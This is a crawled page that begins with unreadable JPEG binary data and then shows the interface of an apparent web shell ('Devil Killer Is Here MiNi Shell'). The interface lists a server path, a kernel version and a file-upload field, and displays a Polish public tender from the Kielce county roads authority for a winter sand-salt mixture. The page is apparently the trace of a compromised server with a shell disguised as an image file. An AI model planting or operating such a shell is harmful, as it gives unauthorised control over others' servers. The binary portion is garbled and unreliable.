JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221025/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221025/0040879301-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Wykonanie, składowanie i załadunek na piaskarki mieszanki piaskowo-solnej przeznaczonej do zimowego utrzymania dróg powiatowych na terenie powiatu kieleckiego w sezonie zimowym 2022/2023. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Kielecki - Powiatowy Zarząd Dróg w Kielcach</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">ul. Wrzosowa 44, 25-211 Kielce</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 291087120</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Wrzosowa 44</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kielce</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">25-211</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">świętokrzyskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL721 - Kielecki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne@pzdkielce.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://pzdkielce.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie, składowanie i załadunek na piaskarki mieszanki piaskowo-solnej przeznaczonej do zimowego utrzymania dróg powiatowych na terenie powiatu kieleckiego w sezonie zimowym 2022/2023. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a57f942b-5428-11ed-8832-4e4740e186ac</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00408793</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-10-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00012439/08/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Wykonanie, składowanie i załadunek na piaskarki mieszanki piaskowo-solnej przeznaczonej do zimowego utrzymania dróg powiatowych na terenie powiatu kieleckiego w sezonie zimowym 2022/2023</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://pzdkielce.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://pzdkielce.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1) W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami w szczególności składanie oświadczeń, wniosków (innych niż wskazanych w pkt 2), zawiadomień oraz przekazywanie informacji odbywa się elektronicznie za pośrednictwem https://pzdkielce.ezamawiajacy.pl<br/>i zakładki „Korespondencja” dostępnej na stronie dotyczącej danego postępowania. W sytuacjach awaryjnych np. w przypadku niedziałania https://pzdkielce.ezamawiajacy.pl Zamawiający może również komunikować się z wykonawcami za pomocą poczty elektronicznej.<br/>2) Komunikacja za pośrednictwem platformy zakupowej wymaga założenia konta Użytkownika.<br/>3) W celu założenia konta Użytkownika na platformie zakupowej, koniecznym jest posiadanie przez Użytkownika (Wykonawcę) aktywnego konta poczty elektronicznej (e – mail). Korzystanie z platformy zakupowej przez Wykonawcę jest bezpłatne.<br/>4) Niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę <br/>na https://pzdkielce.ezamawiajacy.pl, tj.:<br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości <br/>nie mniejszej niż 512 kb/s,<br/>b) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux,<br/>lub ich nowsze wersje,<br/>c) zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2 najlepiej w najnowszej wersji, w przypadku Internet Explorer minimalnie wersja 10 0.,<br/>d) włączona obsługa JavaScript,<br/>e) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>f) Platforma działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8,<br/>g) Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>5) Niezbędne wymagania sprzętowo-aplikacyjne umożliwiające prawidłowe złożenie podpisu elektronicznego:<br/>a) rekomendowaną przeglądarką do złożenia oferty jest MS Internet Explorer lub Firefox w wersji wspieranej przez producenta.<br/>b) Uruchomienie oprogramowania do składania podpisu wymaga również zainstalowania Java w wersji 1.8.0_65 lub nowszej, koniecznie w wersji 32-bitowej, pozwalające na przyjmowanie przez użytkownika<br/>sesyjnych plików cookie oraz obsługującej szyfrowanie. Konieczne jest również dodanie adresu witryny platformy Marketplanet (ezamawiajacy.pl) do wyjątków (exception site list) w Javie. Uwaga: wymaga to uprawnień administracyjnych na komputerze.<br/>c) Zainstaluj dedykowany komponent Szafir SDK oraz aplikację Szafir Host, który odpowiada za obsługę funkcjonalności podpisu elektronicznego <br/>w platformie Marketplanet. Po zainstalowaniu rozszerzenia Szafir SDK <br/>oraz aplikacji Szafir Host należy przeładować bieżącą stronę.<br/>d) Przed uruchomieniem platformy ezamawiajacy, w pierwszej kolejności należy podłączyć czytnik z kartą kryptograficzną do komputera.<br/>6) Informacje dotyczące odpowiedniego przygotowania stanowiska są zwarte na stronie: https://oneplace.marketplanet.pl/przygotuj-stanowisko-pc-wykonujac-ponizsze-kroki. Pozostałe szczegółowe informacje zawarte <br/>są w rozdziale XII SWZ PZD.26.29.2022</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), zwanym dalej „RODO”, informuję, że: 􀀀 administratorem Pani/Pana danych<br/>osobowych jest Powiatowy Zarząd Dróg w Kielcach, ul. Wrzosowa 44, 25-211 Kielce; 􀀀 inspektorem ochrony danych osobowych w Powiatowym Zarządzie Dróg w Kielcach jest Pan Sylwester Cieśla, kontakt: iod@czi24.pl, telefon (41) 300-55-99*; 2. 1. Firmą przetwarzającą dane jest spółka Otwarty<br/>Rynek Elektroniczny S.A. siedzibą w Warszawie (02-672) przy ul. Domaniewskiej 49, wpisaną do Rejestru Przedsiębiorców Krajowego Rejestru Sądowego, prowadzonego przez Sąd Rejonowy dla m.st. Warszawy <br/>w Warszawie XIII Wydział Gospodarczy Krajowego Rejestru Sądowego pod numerem KRS: 0000041441, REGON: 017282436, NIP: 526-25-35-153, jako właściciel Platformy Zakupowej, na której Powiatowy Zarząd Dróg <br/>w Kielcach prowadzi postępowania o udzielenie zamówienia publicznego, działając pod adresem: https://pzdkielce.ezamawiajacy.pl − * Wyjaśnienie: informacja w tym zakresie jest wymagana, jeżeli w odniesieniu do danego administratora lub podmiotu przetwarzającego istnieje obowiązek wyznaczenia inspektora ochrony danych osobowych. **<br/>Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp <br/>oraz nie może naruszać integralności protokołu oraz jego załączników. *** Wyjaśnienie:<br/>prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu <br/>do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa<br/>członkowskiego. Zgodnie z Rozporządzeniem Parlamentu Europejskiego <br/>i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. Wykonawca na podstawie art. 28 staje się podmiotem przetwarzającym i do obowiązków Wykonawcy należą m.in. obowiązki wynikające z art. 13 i art. 14 oraz obowiązki<br/>wynikające z art. 32 – 36 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. Ponadto wykonawca będzie musiał wypełnić obowiązek informacyjny wynikający z art. 13 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r.<br/>względem osób fizycznych, których dane przekazuje Zamawiającemu <br/>i których dane pośrednio pozyskał, chyba że ma zastosowanie co najmniej jedno z włączeń, o których mowa w art. 14 ust. 5 RODO. W związku <br/>z powyższym Wykonawca na formularzu OFERTA, stanowiącym Załącznik <br/>nr 1 do SWZ, składa (o ile dotyczy) stosowne oświadczenie. Pozostałe informacje dotyczące danych osobowych znajdują się w rozdziale XXXI SWZ.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z Rozporządzeniem Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. Wykonawca na podstawie art. 28 staje <br/>się podmiotem przetwarzającym i do obowiązków Wykonawcy należą m.in. obowiązki wynikające z art. 13 i art. 14 oraz obowiązki wynikające z art. 32 – 36 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. Ponadto wykonawca będzie musiał wypełnić obowiązek<br/>informacyjny wynikający z art. 13 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. względem osób fizycznych, których dane przekazuje Zamawiającemu i których dane pośrednio pozyskał, chyba że ma zastosowanie co najmniej jedno z włączeń, o których mowa w<br/>art. 14 ust. 5 RODO. W związku z powyższym Wykonawca na formularzu OFERTA, stanowiącym załącznik nr 1 do SWZ, składa (o ile dotyczy) stosowne oświadczenie. Pozostałe informacje dotyczące danych osobowych znajdują się w rozdziale XXXI SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PZD.26.29.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 731850 PLN </span> </h3> <h3 class="mb-0">4.1.6.) Wartość zamówienia stanowiącego przedmiot tego postępowania (bez VAT): <span class="normal"> 595000 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">7</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Wykonanie, składowanie i załadunek 1000 Mg mieszanki piaskowo-solnej przez wykonawcę będącego właścicielem lub dzierżawcą placu położonego na terenie gminy Chęciny (teren Obwodu Drogowego w Celinach).<br/>Mieszanka ma być wykonana z piasku zakupionego przez wykonawcę i soli drogowej dostarczonej przez zamawiającego oraz załadowana ładowarką należącą do wykonawcy na piaskarki zamawiającego. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 70000 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">98300000-6 - Różne usługi</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-04-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.12.) Opis wznowienia</h3> Wykonanie, składowanie i załadunek 1000 Mg mieszanki piaskowo-solnej przez wykonawcę będącego właścicielem lub dzierżawcą placu położonego na terenie gminy Chęciny (teren Obwodu Drogowego w Celinach).<br/>Mieszanka ma być wykonana z piasku zakupionego przez wykonawcę i soli drogowej dostarczonej przez zamawiającego oraz załadowana ładowarką należącą do wykonawcy na piaskarki zamawiającego. <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">1. Zamawiający przewiduje udzielenia zamówienia, o którym mowa <br/>w art. 214 ust. 1 pkt. 7 ustawy Pzp.<br/>2. Zamówienie polegające na powtórzeniu podobnych usług (zgodnych <br/>z przedmiotem zamówienia podstawowego), może zostać udzielone dotychczasowemu wykonawcy usługi (tj. Wykonawcy zamówienia podstawowego) w okresie 3 lat od dnia udzielenia zamówienia podstawowego zgodnie z art. 214 ust. 1 pkt 7 ustawy pzp.<br/>3. Zakres przewidywanych zamówień uzupełniających (podobnych usług) wynosi:<br/>- dla zadania Nr 1/ODC – 500 Mg</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy dokonywaniu wyboru najkorzystniejszej oferty zamawiający będzie się kierował następującymi kryteriami ocen i ich wagami:<br/>- cena – 80 % = 80 pkt,<br/>- czas reakcji od złożenia dyspozycji - 20% = 20 pkt<br/>Maksymalnie wykonawca może otrzymać 100 punktów (1%=1pkt) oferując najniższą cenę, oraz najkrótszy czas reakcji.<br/>1.1 Kryterium – cena (PC).<br/>Kryterium „cena” będzie rozpatrywane na podstawie ceny brutto <br/>za wykonanie przedmiotu zamówienia, podanej przez wykonawcę <br/>na formularzu „Oferta”. Zamawiający ofercie o najniższej cenie przyzna 80 punktów, a każdej następnej zostanie przyporządkowana liczba punktów proporcjonalnie mniejsza, według wzoru:<br/> najniższa cena brutto z ocenianych ofert<br/>PC = ---------------------------------------------------------- x 80 pkt<br/> cena brutto badanej oferty<br/>1.2 Kryterium – czas reakcji od złożenia dyspozycji (PR).<br/>Kryterium „czas reakcji od złożenia dyspozycji” będzie rozpatrywane na podstawie czasu reakcji, jaką wykonawcy zaproponują w formularzu „Oferta”.<br/>Ocena w zakresie kryterium czasu reakcji od złożenia dyspozycji zostanie dokonana w następujący sposób:<br/>- 20 punktów otrzyma oferta, której wykonawca zadeklaruje przystąpienie <br/>do realizacji usługi w czasie nie dłuższym niż 1 godzina lub do 1 godziny;<br/>- 10 punktów otrzyma oferta, której wykonawca zadeklaruje przystąpienie <br/>do realizacji usługi w czasie do 1,5 godziny lub 1,5 godziny.<br/>Jeżeli w ofercie wykonawca nie zadeklaruje czasu reakcji, poda wartość 0 lub dłuższy niż 1,5 godziny otrzyma 0 punktów w kryterium „czas reakcji <br/>od złożenia dyspozycji”.<br/>1.3 Punkty liczone wg powyższych kryteriów zostaną zsumowane.<br/>Za ofertę najkorzystniejszą uznana zostanie oferta wykonawcy, która w sumie uzyska największą ilość punktów obliczoną wg poniższego wzoru:<br/>PŁ = PC + PR<br/>gdzie: PC – liczba punktów w kryterium „cena” PR – liczba punktów w kryterium „czas reakcji od złożenia dyspozycji” PŁ – liczba punktów łącznie.<br/>1.4 Punktacja przyznawana ofertom w poszczególnych kryteriach będzie liczona z dokładnością do dwóch miejsc po przecinku. Najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę. 1.5 Zamawiający udzieli zamówienia wykonawcy, który spełni wszystkie wymagania określone <br/>w specyfikacji warunków zamówienia oraz otrzyma największą liczbę punktów spośród rozpatrywanych ofert na realizację przedmiotu zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji od złożenia dyspozycji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Wykonanie, składowanie i załadunek 1500 Mg mieszanki piaskowo-solnej przez wykonawcę będącego właścicielem lub dzierżawcą placu położonego na terenie gminy Bieliny (teren Obwodu Drogowego w Łagowie).<br/>Mieszanka ma być wykonana z piasku zakupionego przez wykonawcę i soli drogowej dostarczonej przez zamawiającego oraz załadowana ładowarką należącą do wykonawcy na piaskarki zamawiającego. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 105000 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">98300000-6 - Różne usługi</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-04-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.12.) Opis wznowienia</h3> Wykonanie, składowanie i załadunek 1500 Mg mieszanki piaskowo-solnej przez wykonawcę będącego właścicielem lub dzierżawcą placu położonego na terenie gminy Bieliny (teren Obwodu Drogowego w Łagowie).<br/>Mieszanka ma być wykonana z piasku zakupionego przez wykonawcę i soli drogowej dostarczonej przez zamawiającego oraz załadowana ładowarką należącą do wykonawcy na piaskarki zamawiającego. <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">1. Zamawiający przewiduje udzielenia zamówienia, o którym mowa w art. 214 ust. 1 pkt. 7 ustawy Pzp.<br/>2. Zamówienie polegające na powtórzeniu podobnych usług (zgodnych <br/>z przedmiotem zamówienia podstawowego), może zostać udzielone dotychczasowemu wykonawcy usługi (tj. Wykonawcy<br/>zamówienia podstawowego) w okresie 3 lat od dnia udzielenia zamówienia podstawowego zgodnie z art. 214 ust. 1 pkt 7 ustawy pzp.<br/>3. Zakres przewidywanych zamówień uzupełniających (podobnych usług) wynosi:<br/>- dla zadania Nr 2/ODŁ - 750 Mg</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy dokonywaniu wyboru najkorzystniejszej oferty zamawiający będzie się kierował następującymi kryteriami ocen i ich wagami:<br/>- cena – 80 % = 80 pkt,<br/>- czas reakcji od złożenia dyspozycji - 20% = 20 pkt<br/>Maksymalnie wykonawca może otrzymać 100 punktów (1%=1pkt) oferując najniższą cenę, oraz najkrótszy czas reakcji.<br/>1.1 Kryterium – cena (PC).<br/>Kryterium „cena” będzie rozpatrywane na podstawie ceny brutto <br/>za wykonanie przedmiotu zamówienia, podanej przez wykonawcę <br/>na formularzu „Oferta”. Zamawiający ofercie o najniższej cenie przyzna 80 punktów, a każdej następnej zostanie przyporządkowana liczba punktów proporcjonalnie mniejsza, według wzoru:<br/> najniższa cena brutto z ocenianych ofert<br/>PC = 